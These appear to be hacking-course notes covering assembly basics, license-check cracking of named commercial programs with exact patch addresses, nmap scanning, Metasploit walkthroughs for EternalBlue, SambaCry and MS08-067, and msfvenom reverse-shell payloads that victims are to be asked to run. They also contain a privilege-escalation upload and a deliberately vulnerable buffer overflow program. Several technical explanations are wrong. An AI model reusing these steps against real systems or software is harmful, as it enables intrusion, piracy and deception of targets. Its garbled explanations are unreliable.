3670Data Forensics
3671==============
3672 We can recover almost any sort of data from the digital media.
3673 CD
3674 DVD
3675 Pen drive
3676 HDD
3677 Computer
3678
3679Number System In Computers
3680==========================
36811. Binary
36822. Decimal
36833. Octal
36844. Hexa Decimal
3685
3686Decimal Binary Octal HexaDecimal
3687-----------------------------------------------------------
36880-9 0 and 1 0-7 0-9|A-F
368910 Digits 2 digits 8 digits 16 digits
3690Base 10 base 2 base 8 base 16
3691------------------------------------------------------------
36920 0 0 0
36931 1 1 1
36942 10 2 2
36953 11 3 3
36964 100 4 4
36975 101 5 5
36986 110 6 6
36997 111 7 7
37008 1000 10 8
37019 1001 11 9
370210 1010 12 A --> 10
370311 1011 13 B --> 11
370412 1100 14 C --> 12
370513 1101 15 D --> 13
370614 1110 16 E --> 14
370715 1111 17 F --> 15
3708
3709
3710
3711
3712
3713
3714 128 64 32 16 8 4 2 1
3715126 0 1 1 1 1 1 1 0
3716192 1 1 0 0 0 0 0 0
3717
3718
3719
3720
3721
3722Computer Programming Language
3723=============================
37241. High Level Language
37252. Low Level Language
37263. Mid Level Language
3727
37281. High Level Language
3729======================
3730 Are written and understood by the humans. These type of Programming Language uses english and mathematical expression. That's why it is understandable to humans.
3731 c, c++, java, python, ruby
3732
37332. Low Level Language
3734=====================
3735 It is a language which is only and only understandabel to machine or computers. It contains 0 and 1 --> Binary Language
3736 222 ---> 101010
3737
37383. Mid Level Language
3739=====================
3740 Are the languages which converts high level language to a low level Language.
3741 They use registers, hex values as the location.
3742 We can retriev mid level language from low level language.
3743 Eg. Assembly Language
3744
3745High ----> Mid Level Language ---> Low Level Language
3746C programming example
3747.c --> .o --> exe
3748
3749Assembely Language
3750==================
3751 It uses registers and the memory location in hexa decimal for storing the content or its reference of other programming language.
3752
37538085 processor
3754
3755Registers
3756=========
37571. General Purpose Registers
37582. Special Purpose Registers
37593. Segment Registers
3760
37611. General Purpose Registers
3762============================
3763 Are used to store any transient data. ---> Temporary data.
3764 Registers which are required by the program
3765 AX
3766 BX
3767 CX
3768 DX
3769 They are the combination of two 8 bit registers
3770 Low Byte
3771 High Byte
3772 AX ---> AL AH
3773 16 bit --> 8 bit 8 bit
3774 AX = 1234
3775 AL --> 34
3776 AH --> 12
3777 Low Byte | High Byte
3778 ====================
3779 AL AH
3780 BL BH
3781 CL CH
3782 DL DH
3783
3784
3785Extended form of the Register
3786-----------------------------
3787 EAX
3788 EBX
3789 ECX
3790 EDX
3791
3792 EAX - 32 bit register
3793
3794
37952. Special Purpose Register
3796===========================
3797 Data Structure
3798 Array
3799 Union
3800 Structure
3801 Heap
3802 Stack
3803
3804 They store the data in the form of a stack.
3805 1. SP - Stack Pointer - It points at the top of the stack.
3806 2. BP - Base Pointer - It points at the base of the stack.
3807 3. IP - Instruction Pointer - It points at the address of the next instruction.
3808 4. SI - Source Index Pointer
3809 5. DI - Destination Index Pointer
3810
38113. Segment Registers
3812====================
3813 CS - Code Segment
3814 DS - Data Segment
3815 ES - Extra Segment
3816 SS - Stack Segment
3817
3818Other registers (Reference)
3819===============
38201. Memory Address Register (MAR):
3821 This register holds the address of memory where CPU wants to read or write data. When CPU wants to store some data in the memory or reads the data from the memory, it places the address of the required memory location in the MAR.
38222. Memory Buffer Register (MBR):
3823 This register holds the contents of data or instruction read from, or written in memory. The contents of instruction placed in this register are transferred to the Instruction Register, while the contents of data are transferred to the accumulator or I/O register. In other words you can say that this register is used to store data/instruction coming from the memory or going to the memory.
38243. Program Counter (PC):
3825 Program Counter register is also known as Instruction Pointer Register. This register is used to store the address of the next instruction to be fetched for execution. When the instruction is fetched, the value of IP is incremented. Thus this register always points or holds the address of next instruction to be fetched.
38264. Flag Register:
3827 The Flag register is used to indicate occurrence of a certain condition during an operation of the CPU. It is a special purpose register with size one byte or two bytes. Each bit of the flag register constitutes a flag (or alarm), such that the bit value indicates if a specified condition was encountered while executing an instruction.
3828
3829Assembely Language Basics
3830=========================
3831 1. ADD
3832 Eg. ADD EAX, EBX
3833 EAX = EAX + EBX // Let's assume EBX is 45C02E3
3834 ADD EAX, 45C02E3
3835 EAX = EAX + 45C02E3
3836 2. MUL
3837 3. SUB
3838 4. DIV
3839 5. PUSH - Enter data into the data structure
3840 6. POP - Deletes the top most data from the stack.
3841
3842Conditional Branching
3843=====================
3844 1. CMP - Compare the memory address of registers
3845 2. JMP - Jump - To Jump on certain memory address
3846 3. JZ - Jump if zero - Jump if the result is zero, to a certain memory location
3847 4. JNZ - Jump if not Zero - Jump If the result is non zero
3848 5. JE - Jump if equals - Jump if the data is equal to the data in accumulator
3849 6. JNE - Jump if not equals - Jump if the data is not equal to the data in accumulator
3850
3851Application Patching
3852====================
3853 There are some application, which are very badly coded and can be cracked and there are many bugs inside those application. We use application patching for fixing these bugs.
3854 We do not need to enter any CD keys, Seriel Number, or any sort of registery keys for getting the license and full fledge version of the application.
3855
3856Debugger Tools :
3857
3858 Windows OS - OllyDBG
3859 Immunity Debugger
3860 \x64 Debugger
3861 Linux - GDB - Pre-installed in every linux based OS - GNU Based Debugger
3862
3863OllyDBG
3864=======
3865 It is GUI Based tool, which is used in application patching and used for reverse engineering as well.
3866 1. Address Column
3867 2. Referencce Column
3868 3. Instruction Column
3869 4. String Column
3870
3871--------------------------------------------------------------------------------------------------
3872
3873
3874
3875 SESSION 4
3876 =========
3877
3878REVERSE ENGINEERING
3879===================
3880
3881Engineering : To manufacture a product.
3882= Forward Engineering
3883= Reverse Engineering
3884
3885Forward Engineering
3886====================
3887To use raw material and to make a fully working product
3888 Engineer a car :
3889 Tyre
3890 Engine
3891 Seats
3892
3893 Windows - Olly Debugger, Immunity Debugger
3894 Linux - GDB
3895
3896
3897
38981. Memory Address Register (MAR):
3899 This register holds the address of memory where CPU wants to read or write data. When CPU wants to store some data in the memory or reads the data from the memory, it places the address of the required memory location in the MAR.
39002. Memory Buffer Register (MBR):
3901 This register holds the contents of data or instruction read from, or written in memory. The contents of instruction placed in this register are transferred to the Instruction Register, while the contents of data are transferred to the accumulator or I/O register. In other words you can say that this register is used to store data/instruction coming from the memory or going to the memory.
39023. Flag Register:
3903 The Flag register is used to indicate occurrence of a certain condition during an operation of the CPU. It is a special purpose register with size one byte or two bytes. Each bit of the flag register constitutes a flag (or alarm), such that the bit value indicates if a specified condition was encountered while executing an instruction.
3904
3905
3906Reverse Engineering
3907=====================
3908 We got the car, we will dismantle it, and will get the juicy stuff out of it.
3909 Softwares and products,
3910 CD keys
3911 Registration IDS
3912 To convert a demo software into a full working software
3913
3914Eg.
3915
3916Install Games in computer ----> Copy ---> crack|Patch and paste it, where it is installed. ---> Patching
3917
3918Assembely Language Basics
3919=========================
3920 1. ADD
3921 add eax, ebx
3922 eax = eax + ebx
3923 add eax, 45
3924 eax = eax + 45
3925 2. MUL
3926 3. SUB
3927 4. DIV
3928 5. Push --> Enter data into the data structure
3929 6. POP ---> Deletes the top most data from the stack.
3930
3931Conditional Branching
3932=====================
3933 1. CMP --> Compare
3934 2. JMP --> To Jump on certain memory address
3935 3. JZ ---> Jump if the result is zero, to a certain memory location
3936 4. JNZ --> Jump If the result is non zero
3937 5. JE --> Jump if the data is equal to the data in accumulator
3938 6. JNE --> Jump if the data is not equal to the data in accumulator
3939
3940
3941Application Patching
3942====================
3943 There are some application, which are very badly coded and can be cracked and there are many bugs inside those application. We use application patching for fixing these bugs.
3944 We do not need to enter any CD keys, Seriel Number, or any sort of registery keys for getting the license and full fledge version of the application.
3945
3946Tool > Debugger Tool
3947 Windows OS > OllyDBG
3948 > Immunity Debugger
3949 Linux > GDB > By Default installed in every linux based OS
3950
3951OllyDBG
3952=======
3953 It is GUI Based tool, which is used in application patching and used for reverse engineering as well.
3954 1. Address Column
3955 2. Referencce Column
3956 3. Instruction Column
3957 4. String Column
3958
3959Reverse Engineering via Algorithm Reversing
3960===========================================
3961 We are going to make some changes in the application's algorithm and will make it work as we want it to do.
3962 It shows, Please enter the serial keys for making it a full version
3963
3964
3965OLly Debugger : http://www.ollydbg.de/download.htm
3966
3967Walkthrough :
3968We Enter something
3969THe Error Message came
3970- We will search in the algorithm
3971- Make the algorithm to jump
3972
39731. Custom Based Application : Small application in C programming Language
39742. BPK Keylogger Detector
39753. POWER ISO
3976
3977Requirements
3978============
39791. Debugger - OllyDBG, Immunity Debugger
3980 http://www.immunityinc.com/products/debugger/
3981 Linux - GDB
39822. OS : Windows 7 ultimate, XP(any service pack)
39833. Vulnerable applications
3984
3985
39861. Custom Based Applciation Cracking
3987====================================
3988
3989
3990#include <stdio.h>
3991#include <stdlib.h>
3992#include <conio.h>
3993int main()
3994{
3995 int key, inp;
3996 key = 112233;
3997 printf("Please Enter the CD-KEY for continue = ");
3998 scanf("%d",&inp);
3999 if(key == inp)
4000 {
4001 printf("Successfully Registered, You can continue with the full version\n");
4002 }
4003 else
4004 {
4005 printf("Invalid Key\n");
4006 }
4007 getch();
4008 return 0;
4009}
4010
4011C to exe converter :http://www.onlinecompiler.net/
4012
4013
4014Convert this into .exe via Online Convertors.
4015-----------------------------------------------------------------------------
4016
4017Steps to Reverse Engineer :
4018
4019004012E8 |. C70424 2C30400>MOV DWORD PTR SS:[ESP],reee.0040302C ; |ASCII "Successfully Registered....
4020You can continue with the full version
4021"
4022
4023JMP 004012E8
4024
4025
40262. BPK Keylogger Detector
4027=========================
4028
4029Download Link : https://www.sendspace.com/file/722rb6
4030 https://ufile.io/q9xgl
4031
4032
4033---------------------------
4034Registration error
4035---------------------------
4036Registration code or user name is invalid. Please check all fields and try again!
4037---------------------------
4038OK
4039---------------------------
4040
4041Successfull MEssage
4042004049A5 |. 68 504B4900 PUSH antispy.00494B50 ; |Text = "Registration succeeded. Thank you for choosing Keylogger Detector!"
4043
4044Copy the address
4045
4046JMP 004049A5
4047
4048------------------------------------------------------------------------------------
4049
4050
40513. Power ISO
4052============
4053 Download Link : https://www.filehorse.com/download-poweriso-32/
4054
4055---------------------------
4056PowerISO
4057---------------------------
4058The username or serial number is invalid.
4059---------------------------
4060OK
4061---------------------------
4062
4063
4064Successfull Message
4065
406600467D3F . 68 84066A00 PUSH PowerISO.006A0684 ; UNICODE "Thank you for your registration."
4067
4068JMP 00467D3F
4069
4070
4071
4072 SESSION 5
4073 =========
4074(Not available as of now)
4075
4076
4077
4078 SESSION 6
4079 =========
4080
4081NSA : Network Security Analysis
4082===============================
4083Information Gathering
4084Scanning
4085
4086 To identify the network, the number of PC/devices connected to the network, what are the services running on the devices and much more.
4087
4088 It is something like information gathering in the network.
4089
4090 For PT part, we need to know the services, or for hacking part we need to know which port is open and what are the services running on those opened ports, I need to have the IP Addresses of all the decices which are connected in the network.
4091
4092Necessary information which is required in the Network Security analysis part
4093 IP Addresses
4094 MAC Addresses
4095 Ports opened
4096 Service Running over those ports
4097 Version Of the running services
4098 Operating System
4099 Operating System Family
4100 Operating System Version
4101
4102Two Type of Information Gathering
4103 1. Normal Information Gathering
4104 2. Advance/Intelligent Information Gathering
4105
4106Normal Information Gathering
4107----------------------------
4108 - How many IP addresses are up in the network
4109 - What are the MAC Addresses
4110 - Vendor name Of the MAC/NIC
4111 - HOSTNAME
4112
4113 Netdiscover - tool used for normal information gathering
4114
4115netdiscover -i eth0 -r 192.168.0.1/24
4116
4117 _____________________________________________________________________________
4118 IP At MAC Address Count Len MAC Vendor
4119 -----------------------------------------------------------------------------
4120 192.168.0.215 24:31:84:77:70:e9 06 360 Lenovo Pvt Ltd
4121 192.168.0.186 00:50:56:be:7e:1f 02 120 VMWare, Inc.
4122 192.168.0.167 1c:66:6d:8c:ec:10 27 1620 Unknown vendor
4123 192.168.0.116 00:24:d7:d1:2f:54 05 300 Intel Corporation
4124 192.168.0.1 90:6c:ac:e6:eb:bc 15 900 Unknown vendor
4125 192.168.0.14 00:0c:29:ec:6c:7f 01 060 VMware, Inc.
4126
4127
4128
4129
4130Advance/Intelligent Information Gathering
4131-----------------------------------------
4132We will receive all the information which is necessary and is must for hacking into the system
4133
4134 - IP Addresses
4135 - MAC Addresses
4136 - PORT NUMBER
4137 - Statistics of Ports
4138 - Open | Closed | Filtered
4139 - Service Running over those ports
4140 - Version Of the running services
4141 - Operating System
4142 - Operating System Service Pack
4143 - Operating System Family
4144 - Operating System Version
4145 - OS BUILD NUMBER
4146- - SERVICES
4147 - FIREWALL / WAF / IDS / IPS/ UTM
4148 - VULNERABILITIES
4149 - CVE
4150 - CVSS
4151 - Enumerateion of Data
4152
4153
4154
4155Tools in Action -
4156
4157NMAP
4158ZENMAP (GUI Nmap)
4159
4160NMAP
4161====
4162Nmap (“Network Mapper”) is an open source tool for network exploration
4163 and security auditing. It was designed to rapidly scan large networks,
4164 although it works fine against single hosts. Nmap uses raw IP packets
4165 in novel ways to determine what hosts are available on the network,
4166 what services (application name and version) those hosts are offering,
4167 what operating systems (and OS versions) they are running, what type of
4168 packet filters/firewalls are in use, and dozens of other
4169 characteristics. While Nmap is commonly used for security audits, many
4170 systems and network administrators find it useful for routine tasks
4171 such as network inventory, managing service upgrade schedules, and
4172 monitoring host or service uptime.
4173
4174 The output from Nmap is a list of scanned targets, with supplemental
4175 information on each depending on the options used. Key among that
4176 information is the “interesting ports table”. That table lists the
4177 port number and protocol, service name, and state. The state is either
4178 open, filtered, closed, or unfiltered. Open means that an application
4179 on the target machine is listening for connections/packets on that
4180 port. Filtered means that a firewall, filter, or other network
4181 obstacle is blocking the port so that Nmap cannot tell whether it is
4182 open or closed. Closed ports have no application listening on them,
4183 though they could open up at any time.
4184
41856 main packets
4186 1. ACK --> Acknowledgement
4187 2. SYN --> Synchronization
4188 3. FIN --> Finish
4189 4. RST --> Reset
4190 5. PSH --> Push
4191 6. URG --> Urgent
4192
4193NMAP - Network Mapper
4194======================
4195
41961. To scan whole of the network
4197 nmap 192.168.0.1(Target/Router's IP)-255
4198
41992. To scan for services
4200 nmap -sS Target IP
4201
4202 (-sS - Syn Stealth Scan)
4203
42043. For checking the version of the running servvice
4205 nmap -sS -sV Target IP
4206
4207 (-sv - Verbose - For Maximum output like Versions)
4208
42094. Brief Description of the target machine
4210 namp -sS -sC -sV Target IP
4211
4212 -sS(TCP Syn Scan) - Service Detection
4213 -sV - Verbose - For Maximum output like Versions
4214 -sC
4215
42165. If i just want to scan for the operating system version
4217 nmap -O Target IP
4218
4219 (-O : OS Detection Scan)
4220 Focus on OS Details More.
4221
42226. For checking the status of firewall
4223 nmap -f Target IP
4224 OR
4225 nmap -sA Target IP
4226
4227 (-f - Firewall Detection | -sA - TCP ACK scan)
4228
42297. Aggressive Scan
4230 nmap -A -T4 Target IP
4231
4232 -A : Aggressive Script , -T4 - Consecutively 4 packets sent.
4233
42348. Port Scan
4235 nmap -p 0-65535 Target IP //Range
4236 OR
4237 nmap -p135,139,445 Target IP // Specifics
4238
42399. Vulnerability Scan for CVE and CVSS
4240 nmap --script vuln Target IP
4241
4242 (--script vuln : Provided by National Vulnerability Database)
4243
424410. Scanning Subnets
4245 nmap 192.168.0.1/24 (Target/Router's IP)
4246
424711. Firewall Bypass Scan - Ping Probe Scan\
4248 nmap -Pn -p15,139,445 -sSVC Target's IP
4249
4250 (-Pn - Ping Not Script - Which will not send ICMP Traffic)
4251
425212. Fast Scan
4253 nmap -F -sSVC Target's IP
4254
4255 (-F - For Fast Scan)
4256
425713. UDP Scan
4258 nmap -sU Target's IP
4259
4260 (-sU for UDP)
4261
4262For more : Reference - https://nmap.org/book/man.html
4263 https://nmap.org/book/
4264
4265
4266
4267 SESSION 7
4268 =========
4269
4270METASPLOIT FRAMEWORK
4271====================
4272 Metasploit is a penetration testing platform that enables you to find, exploit, and validate vulnerabilities. Most of the researchers uses this tool for exploiting devices, machine, databases and servers.
4273 This tool is a product of Rapid7 community.
4274 Metasploit Framework we use is a trial version|limited version.
4275
4276
4277 MODULE CONTAINING :
4278
4279 Payloads
4280 Exploits
4281 Auxiliary
4282 Encoders
4283 NOPS
4284 Post
4285
4286
4287Terminologies
4288=============
42891. Vulnerabilities
42902. Exploit
42913. Payload
42924. Backdoor
42935. Covering Traces
4294
4295Terms
4296=====
4297RHOST : Remote Host - Target's IP Address in which we have to attack.
4298RPORT : Remote Port - The port number of target machine on which a vulnerable service is running
4299LHOST : Listening Host - Attacker's IP Address on which they are listening to reverse connection
4300LPORT : Listening Port - The port number on which an attacker is listening the reverse connection.
4301
4302
4303CONSOLE BASED EXPLOIT - 1
4304==========================
4305Reuirements :
4306= XP Service Pack 0 And Service Pack 1
4307= Kali Linux
4308= Metasploit Framework
4309
4310KALI : https://www.exploit-db.com/exploits/66/
4311
4312DCOM is an acronym that stands for Distributed Component Object Model is a protocol that enables software components to communicate directly over a network which by default runs in Win XP SP0-SP1 and Win Server 2000.
4313
4314Steps:
4315======
43161. nmap -sS -sC -sV <IP Address>
43172. nmap -A -T4 <IP Address>
43183. msfconsole
43194. search the corresponding exploit
4320 search dcom
43215. use <path of the above exploit>
43226. show info - information of the exploit
43237. show options - to show the options of the exploit
43248. set RHOST <target IP Address>
43259. show options
432610. exploit
4327
4328
4329CONSOLE BASED EXPLOIT - 2
4330=========================
4331Reuirements :
4332= XP Service Pack 2
4333= Kali Linux ---> Updates
4334= Metasploit Framework
4335
4336Netapi32.dll is a module that contains the Windows NET API used by applications to access a Microsoft network. netapi32.dll is a system process that is needed for your PC to work properly and it should not be removed. The version of Netapi.dll in Win Xp SP2 is vulnerable and allows the remote attacker to get the remote access of the machine.
4337
4338LINK : https://www.exploit-db.com/exploits/40279/
4339
4340Steps:
4341======
43421. nmap -sS -sC -sV <IP Address>
43432. nmap -A -T4 <IP Address>
43443. msfconsole
43454. search the corresponding exploit
4346 search ms08-067/netapi
43475. use <path of the above exploit>
43486. show info --> information of the exploit
43497. show options --> to show the options of the exploit
43508. set RHOST <target IP Address>
43519. show options
435210. exploit
4353
4354
4355KiMi Framework
4356==============
4357It is a framework for exploiting linux based OS. It is named after a character of Naruto - Kimimaro. In this framework, we create a malicious file of extension .deb (debian file extension). We ask the target to install that debian package. as soon as the target install the debian package, we will receive a meterpreter session.
4358We need to download this framework from github
4359https://github.com/ChaitanyaHaritash/kimi
4360
4361
4362STEPS :
4363=======
4364Copy the link
4365Open the linux teminal and type
4366#git clone https://github.com/ChaitanyaHaritash/kimi.git
4367#cd kimi
4368#python kimi.py -h(help page)
4369
4370
4371https://www.offensive-security.com/metasploit-unleashed/
4372
4373
4374
4375 SESSION 8
4376 =========
4377
4378On April 14, 2017, the Shadow Brokers Group released the FUZZBUNCH framework, an exploitation toolkit for Microsoft Windows. The toolkit was allegedly written by the Equation Group, a highly sophisticated threat actor suspected of being tied to the United States National Security Agency (NSA). This documents lists five exploits from Lost in Translation leak namely Eternal Blue, Eternal Red, Eternal Synergy, Eternal Romance, Eternal Champion. These five exploits exploit the Server Message Block (SMB) in Windows and Linux Operating System. I tested and compiled different scripts and modules to find the best and stable methods to exploit these five exploits.
4379
4380Eternal Series :
4381
4382Eternal Blue : Windows 7 x64 SP1, Windows 8/8.1 Pro
4383Eternal Red : Kali Linux 2016.2 with vulnerable SAMBA server
4384Eternal Romance : Windows Server 2016, Windows 8.1 Pro, Windows 10 Build 10240
4385Eternal Synergy : Windows Server 2012
4386Eternal Champion : Windows XP SP3
4387
4388
4389-------------------
4390
4391
4392 Console Based Exploitation 3
4393 Windows 7 - Eternal Blue
4394 Samba Cry - Eternal Red
4395 Application Based Exploitation
4396 Payload Based Exploitation
4397 Post Exploitation - Local Privilidge Escalation / Shell to Meterpreter
4398 GUI Based Exploitation - Armitage
4399
4400Console Based Exploitation 3
4401----------------------------
4402 Eternal Blue --> NSA Exploit leaked by Shadow Brokers
4403 EternalBlue-Double Pulsar
4404 dll --> Dynamic Linked Library File
4405 Double Pulsar creates a malicious .dll file and eternal blue executes that malicious .dll file in the target system.
4406 Shadow Brokers - Fuzzbunch.py
4407 Empire Framework - MSF of NSA
4408
4409
4410SMB
4411===
4412Server Message Block operates as an application-layer network protocol mainly used for providing shared access to files, printers, and serial ports and miscellaneous communications between nodes on a network. It also provides an authenticated inter-process communication mechanism. Most usage of SMB involves computers running Microsoft Windows.
4413
4414
4415Eternal Exploitation :
4416
4417Steps
4418=====
4419Open a terminal
44201. #arp-scan --local
4421 Target IP Address --> 192.168.228.138
44222. #nmap 192.168.228.138
44233. #nmap -sS -sC -sV 192.168.228.138
44244. #nmap 192.168.228.138 --script vuln
4425 CVE-2017-0143
4426Open another terminal, start metasploit framework
44275. #msfconsole
44286. #search CVE-2017-0143
44297. #use auxiliary/scanner/smb/smb_ms17_010
44308. #options
44319. #set rhosts 192.168.228.138
443210. #options
443311. #run
4434 Host is vulnerable to the exploit
443512. #use exploit/windows/smb/ms17_010_eternalblue
443613. #show options
443714. #set rhost 192.168.228.138
443815. #options
443916. #exploit
4440 C:/Windows/System32> --> I got the access of the command prompt
4441For Changing the payload
4442 set payload windows/meterpreter/reverse_tcp
4443
4444Samba Cry - Eternal Red
4445=======================
4446 Is the vulnerability for Linux Based OS. SMBv2.
4447 NSA Exploit leaked by Shadow Brokers.
4448Open a terminal
44491. #arp-scan --local
4450 Target IP Address --> 192.168.228.151
44512. #nmap 192.168.228.151
44523. #nmap -sS -sC -sV 192.168.228.151
44534. #nmap 192.168.228.151 --script vuln
4454Open another terminal, start metasploit framework
44555. #search is_known_pipename
44566. #search cve-2017-7494
4457 exploit/linux/samba/is_known_pipename
44587. #use exploit/linux/samba/is_known_pipename
44598. #info
44609. #options
446110. #set rhost 192.168.228.151
446211. #run
4463 Will Give me raw shell --> Bash Shell
4464
4465Application Based Exploitation
4466==============================
4467Open the terminal, start with msfconsole
44681. #msfconsole
44692. #search payload/windows/meterpreter
4470 payload/windows/meterpreter/reverse_tcp --> use
4471 payload/windows/meterpreter_reverse_tcp
4472 payload/windows/meterpreter/reverse_http
4473 payload/windows/meterpreter_reverse_tcp
4474
4475Open Another Terminal, for creating a payload - stub
44763. msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.25 lport=8989 -f exe > /root/Desktop/payload.exe
4477
4478 -p - selecting the payload
4479 windows/meterpreter/reverse_tcp - is the payload
4480 lhost - attacker's IP Address
4481 lport - Listening attacker's port
4482 -f - file format
4483 exe - executable file
4484 > - destination of the output
4485 /root/Desktop/payload.exe - is the output file
4486
4487Go back to the first terminal, exploit, set the listening server
44884. #use exploit/multi/handler
44895. #show options
44906. #set payload windows/meterpreter/reverse_tcp
44917. #show options
44928. #set lport 8989
44939. #set lhost Attacker's IP
449410. #exploit
4495
4496Armitage - GUI Based Exploitation
4497Graphical Version of Metasploit Framework
4498
4499
4500
4501Post Exploitation - Local Privilige Escalation
4502----------------------------------------------
4503DCPP Double Free --> Download it from exploit-db
4504 41458.c
4505 Get access of the system.
4506 Open a terminal in your kali linux.
4507 #cd Downloads
4508 #gcc 41458.c -o shell
4509 For compiling the local privilige escalation file
4510 In the terminal in which meterpreter session in opened
4511 #cd /
4512 #cd /tmp
4513 #upload /root/Downloads/shell
4514 #shell
4515 #whoami
4516 #ls -la
4517 #chmod 777 shell
4518 #./shell
4519 It will give you the root access
4520 #whoami
4521 root
4522
4523-----------------------------------
4524
4525MSF> use shell_to_meterptreter
4526
4527
4528--------------------------------------------------------------------------------------------------
4529
4530
4531
4532 SESSION 9
4533 =========
4534
4535MSFVENOM : Which createsd payloads and binds up the encoding function in that.
4536Msfpayload and Msfencoder in 2015 they both get binded up in one single functionality known as MSFVENOM.
4537
4538We use Msfvenom outside the platform of MSFConsole, cause msfconsole will only provides listening on the reverse connection via exploits.
4539
4540
45411. Application based Payload : Windows (.exe)
4542
4543Microsoft Operating System ---> exe ---> file.exe ---> executable
4544
4545
4546msfvenom -p windows/meterpreter/reverse_tcp lport=1337 lhost=192.168.0.80 -f exe > /root/Desktop/lol.exe
4547
4548 > which we will make executable
4549
45502. Python Based Exploit for Unix/Linux System
4551
4552msfvenom -p cmd/unix/reverse_python lport=1337 lhost=192.168.0.80 -f raw > /root/Desktop/pyth.py
4553
4554Dependencies :
4555Transfer pyth.py in the target machine.
4556Ask the target to make it executable by typing
4557chmod 777 pyth.py
4558
45593. Bash Based Payload for Linux/Unix
4560
4561msfvenom -p cmd/unix/reverse_bash lport=1337 lhost=192.168.0.80 -f raw > /root/Desktop/lmao.sh
4562
4563Transfer lmao.sh in the target machine.
4564Ask the target to make it executable by typing
4565chmod 777 lmao.sh
4566
45674. Perl Based Payload For Linux/Unix (Runs Perfect on MAC)
4568
4569msfvenom -p cmd/unix/reverse_perl lport=1337 lhost=192.168.0.132 -f raw > /root/Desktop/troll.pl
4570
4571Transfer troll.pl in the target machine.
4572Ask the target to make it executable by typing
4573chmod 777 troll.pl
4574
45755. Creating a PHP Shell For Servers
4576
4577msfvenom -p php/meterpreter/reverse_tcp lport=1337 lhost=192.168.0.132 -f raw > /root/Desktop/website.php
4578
45796. Exploit Android/Smart Phones using metasploit using tcp
4580
4581msfvenom -p android/meterpreter/reverse_tcp lport=1337 lhost=192.168.0.132 R > /root/Desktop/mobile.apk
4582
45837. Exploit Android/Smart Phones using metasploit using HTTPS
4584
4585msfvenom -p android/meterpreter/reverse_https lport=1337 lhost=192.168.0.132 R > /root/Desktop/phone.apk
4586
4587FOR ALL THESE, USING METASPLOIT FRAMEWORK LISTENER TO LISTEN THE REVERSE CONNECTION :
4588
4589> Open MSF = msfconsole
4590> Use Exploit = use exploit/multi/handler (A wildcard Exploit which can be used for listening to the reverse connection.)
4591> msfconsole
4592 use exploit/multi/handler
4593 set payload PAYLOADNAME
4594 show options
4595 set lport PORTADDRESSFORLISTENING
4596 set lhost IPADDRESSFORLISTENING
4597 show options
4598 exploit
4599
4600
4601-----------------------------------------------------------------------
4602
4603After Meterpreter,
4604
4605meterpreter> ? (Show Options)
4606meterpreter> Use Commands
4607
4608-----------------------------------------------------------------------
4609Mitigartions :
4610Android :
4611- SAFE by Lucideus
4612- Unhack by Lucideus(available on apkpure.com)
4613- MOBSF (Mobile Security Framework)
4614
4615Windows :
4616- Sysinternals Suite
4617
4618Mac :
4619- https://lucideustech.blogspot.com/2018/01/handsoff-ultimate-firewall-for-your-mac.html
4620
4621
4622CTF List
4623- SwlitoShell1
4624- Bulldog
4625- Dina CTF
4626- Mr. Robot
4627- BtrSysv2.1
4628- Tr0ll 1
4629- Acid Reloaded
4630- Stapler
4631- SqliTo Shell2
4632- Gormint CTF
4633
4634--------------------------------------------------------------------------------------------------
4635
4636
4637
4638 SESSION 10
4639 ==========
4640
4641BoF PART 1
4642==========
4643
4644DATA STRUCTURES
4645===============
46461. STACK > LIFO
46472. HEAP
46483. LINKED LIST
46494. ARRAYS
46505. STRUCTURES
4651
4652Data Variables
46531. int : Integer
46542. char : Character
46553. float : Decimal Values
46564. double : Integer + Decimal Values
4657
4658Buffer overflow
4659===============
4660Buffer overflow is a situation arises when you try to put the data in an array which is more than the size of the array and you haven’t put any exception handling. So you keep on filling the array but the time comes when array ends and you overwrite what was there.
4661
4662When you overwrite the memory data, you can overwrite EIP (Instruction Pointer) which is critical for any application as it holds the return address so when the function ends, it will find ret instruction which will put the program counter at the value which EIP is holding. So if you can change that value you can change the program flow and make it execute something else.
4663
4664Requirements:
4665 Windows 7
4666 Debugging Application - OllyDBG|Immunity Debugger
4667 Vulnerable application
4668 Compiler - Programming Language Platform
4669
4670Vulnerable Application Code
4671---------------------------
4672#include<conio.h>
4673#include<stdio.h>
4674#include<string.h>
4675
4676int overflow(char *s)
4677{
4678 char buffer[10]; //our buffer
4679 strcpy(buffer,s); //vulnerable code
4680 return 0;
4681}
4682void exploit() //payload
4683{
4684 printf("Payload chal gya......\n");
4685}
4686int main(int argc, char *argv[]) //command line argumants
4687{
4688 int a = 0;
4689 printf("Sahi jaa rahe ho beta......\n"); //main body
4690 overflow(argv[1]);
4691 if(a == 1)
4692 {
4693 exploit(); //this should never execute
4694 }
4695 else
4696 {
4697 printf("Buffer overflow nahi chala....\n");
4698 }
4699 return 0;
4700}
4701
4702
4703---------------------------------------------------------------
4704
4705
4706Benefits of BoF
4707---------------
4708When you overwrite the memory data, you can overwrite EIP (Instruction Pointer) which is critical for any application as it holds the return address so when the function ends, it will find ret instruction which will put the program counter at the value which EIP is holding. So if you can change that value you can change the program flow and make it execute something else.
4709
4710Requirement:
4711 1. Ollydbg
4712
4713
4714Execute----> compile ----> we will get a .exe file
4715
4716cmd --> name.exe sdklvns
4717
4718cmd --> name.exe AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
4719error
4720----> view problem details
4721 Exception Offset: 41414141
4722
4723Start ollydbg
4724-------------
4725Open name.exe
4726check as the program flow, where exploit is been called
4727
4728
472900401316 |. E8 94FFFFFF CALL akku.004012AF
4730
4731
473200401316
4733
4734Convert it into little Endian Form ---> Reverse in the pair
4735 00401316
4736 00 40 13 16
4737 16 13 40 00
4738
4739Ok so now we got the new address for the EIP. Let’s find at how many byte from the buffer the actual EIP is. To do this we need to create a long string of random characters without repeating sequence
4740To do this use online string to hash tools.
4741http://www.fileformat.info/tool/hash.htm
4742
4743Hash value of 16 13 40 00 is
4744
47451e66186a8e7f4a61ebaae3f46ae29b7520970ee1d605a28b3f55fe440002e44dd919a774edde630a8eed58831cd0004cea5b3b7f4ed9c2b45b39e62b258d87ba
4746
4747Now run the name.exe with the above hash value...
4748 Exception Offset: 35376239
4749
4750Convert it into Little Endian Form
4751
4752 35376239
4753 35 37 62 39
4754 39 62 37 35
4755 39:62:37:35
4756
4757http://www.dolcevie.com/js/converter.html
4758 for converting hex value to ASCII
4759
4760 9b75
